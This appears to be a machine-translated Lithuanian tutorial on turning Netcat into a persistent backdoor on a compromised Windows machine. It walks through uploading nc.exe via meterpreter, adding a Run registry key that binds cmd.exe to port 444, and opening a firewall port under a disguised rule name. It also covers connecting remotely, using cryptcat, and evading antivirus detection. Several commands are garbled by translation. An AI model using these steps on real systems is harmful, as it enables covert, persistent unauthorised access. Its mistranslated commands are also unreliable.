„Kali Linux NetCat“ nuolatiniai atstovai

Šiame straipsnyje mes apžvelgsime dalykus, kuriuos galite padaryti naudodamiesi tinklo priemone „Netcat“, Šveicarijos armijos tinklo įrankių peiliu.

Įvadas:

„Netcat“ yra tinklo programa, galinti skaityti ir rašyti tiek UDP, tiek TCP prievaduose. Jis dažnai vadinamas Šveicarijos įsilaužimo įrankių peiliu, nes įsilaužimo nuotykių metu jis gali padaryti keletą dalykų ir kliento, ir serverio. Mes dažnai jį naudosime kurdami susegimo ir atvirkštinio apvalkalo gaubtus aplink ataskaitas, norėdami pamatyti, kas vyksta, ir siųsti failus tarp mašinų. „Shell“ yra būdas bendrauti su kompiuteriu, pavyzdžiui, komandų eilute sistemoje „Windows“ arba „Linux“ terminalu. „Netcat“ leidžia mums atlikti daugybę dalykų, pavyzdžiui, atvirkštines lentynas, bendrauti tarp dviejų ar daugiau kompiuterių ir leis jums atlikti gausybę funkcijų. „Netcat“ gali naudoti „Port Scan“ ir prisijungti prie atvirų prievadų naudodamas paprastus komandos argumentus. Jis taip pat gali siųsti failus ir nuotolinį administravimą per tiesioginį arba atvirkštinį apvalkalą.

„Netcat“ kaip nuolatinio agento įdarbinimas:

„Netcat“ yra itin universali ir naudinga programa. Anksčiau šiame straipsnyje minėjau, kad jis naudojamas bendrauti tarp dviejų kompiuterių. Jis taip pat gali būti naudojamas, jei norite įdiegti atkaklumą. „Netcat“ gali būti naudojamas kaip užpakalinė duris. Taigi pradėkime nuo nuolatinio apvalkalo sukūrimo pažeistoje sistemoje naudojant „Netcat“. Mes naudosime -nc.exe, nes tai yra vykdomojo vardas. Bet jei pervardysite prieš naudojimą, sumažinsite aptikimo galimybes. Tačiau net pervadinus antivirusinę programinę įrangą, ją galima aptikti. Daugybė įsilaužėlių keičia kai kuriuos „Netcat“ šaltinio kodo elementus, kurie yra nereikalingi, ir prieš naudodami jį sukompiliuoja. Šie pakeitimai padarys „Netcat“ nematomu antivirusinei programinei įrangai.

Kalyje „Netcat“ saugoma / usr / share / windows-binaries. Norėdami įkelti jį į pažeistą sistemą, naudokite komandą iš skaitiklio:

$ meterpreter> upload / usr / share / windows-binaries / nc.exe C: \\ WINDOWS \\ sistema32

Šiame aplanke yra daug failų tipų, todėl geriausia paslėpti failą pažeistoje sistemoje

Taip pat galite naudoti „Trivial“ failų perkėlimo protokolą, jei neturite matuoklio ryšio failui perduoti.

Kitas žingsnis - sukonfigūruoti registrą, kad, paleidus sistemą, galėtumėte paleisti „Netcat“ ir įsitikinti, kad jis klausosi 444 prievade. Naudokite toliau pateiktą komandą:

$ meterpreter> reg setval -k HKLM programinė įranga „Microsoft“ „Windows“
currentversion \\ run -vv nc -d 'C: \\ windows \\ system32 \\ nc.exe -Ldp 444
-e cmd.exe “

Dabar, kai naudojote pirmiau minėtą komandą, naudokite šią komandą „queryval“, kad įsitikintumėte, jog sėkmingai įvykdyti pakeitimai registre.

$ meterpreter> reg queryval -kHKLM programinė įranga „Microsoft“ „Windows“
currentverion \\ run -vv nc

Atidarykite vietinės užkardos prievadą, kad patvirtintumėte, jog pažeista sistema priims nuotolinius ryšius su „Netcat“ naudodama komandą $ netsh. Svarbiausia žinoti tikslo operacinę sistemą. „Windows Vista“, „Windows Server 2008“ naudojamas komandinės eilutės kontekstas yra

$ netsh advfirewall

Ankstesnėms sistemoms naudojama $ netsh užkardos komanda. Įveskite apvalkalo komandą meterpreter eilutėje, kad pridėtumėte prievadą prie vietinės „Windows“ užkardos, įveskite taisyklę naudodami tinkamą komandą. Kad sistema veiktų tinkamai, įvardijant taisyklę reikia įvesti vartotojo vardą, pvz., „Svchostpassthrough“. Komandos pavyzdys rodomas taip:

$ C: \ Windows \ system32> netsh ugniasienė prideda prievado atidarymą
TCP 444 „paslaugos perdavimas“

Norėdami patvirtinti, kad pakeitimas sėkmingai įgyvendintas naudojant šią komandą:

$ C: \ windows \ system32> netsh ugniasienė rodo prievado atidarymą

Patvirtinę prievado taisyklę, įsitikinkite, kad veikia perkėlimo parinktis.

Iš skaitiklio eilutės įveskite šią komandą:

$ meterpreter> paleiskite iš naujo

Įveskite šią komandą iš interaktyvaus „Windows“ apvalkalo:

$ C: \ windows \ system32> išjungimas -r -t 00

Norėdami nuotoliniu būdu pasiekti pažeistą sistemą, komandinėje eilutėje įveskite $ nc, nurodykite ryšio paprastumą (-v ir -vv praneša pagrindinę informaciją, atitinkamai daug daugiau informacijos), tada įveskite taikinio IP adresą ir prievado numerį.

$ nc -v 192.168.43.128 444

Deja, „Netcat“ turi tam tikrų apribojimų, ty nėra perduodamų duomenų autentiškumo, o antivirusinė programinė įranga gali tai aptikti. Tačiau mažiau šifravimo problemą galima išspręsti naudojant „cryptcat“, kuris yra „Netcat“ alternatyva. Perkėlimo tarp išnaudojamo pagrindinio kompiuterio ir užpuoliko metu jis apsaugo duomenis naudodamas „Twofish“ šifravimą. Nebus klaidinga sakyti, kad tai užtikrina pakankamai stiprią šifruotų duomenų apsaugą.

Įsitikinkite, kad yra klausytojas, paruoštas ir sukonfigūruotas su stipriu slaptažodžiu naudoti „cryptcat“, naudokite šią komandą:

$ sudo cryptcat -k slaptažodis -l -p 444

Kitas žingsnis - įkelti „cryptcat“ į pažeistą sistemą ir sukonfigūruoti ją prisijungti prie klausytojo IP adreso naudojant šią komandą:

$ C: \ cryptcat -k slaptažodis 444

Gaila sakyti, kad „Netcat“ ir jo variantus galima aptikti antivirusine programine įranga. Naudojant „hex“ redaktorių, norint pakeisti „Netcat“ šaltinio kodą, yra tikimybė, kad „Netcat“ nebus aptikta. Bet tai yra ilgas bandymų ir klaidų procesas. Patikimesnis būdas yra naudoti „Metasploit Framework“ patvarumo mechanizmus.

Išvada:

NETCAT yra Šveicarijos armijos peilis, naudojamas efektyviam įsilaužimui. Jis gali atlikti kelias funkcijas, norėdamas pasiekti serverį ir klientą. Šiame straipsnyje pateikiamas trumpas NETCAT veikimo ir naudojimo aprašymas. Tikiuosi, kad jums patiko, jei šis straipsnis padėjo jums pasidalinti ja su draugais. Nesivaržykite paklausti apie bet kokias užklausas, susijusias su NETCAT. Taip pat galite pasidalinti savo nuomone ir išsamia informacija.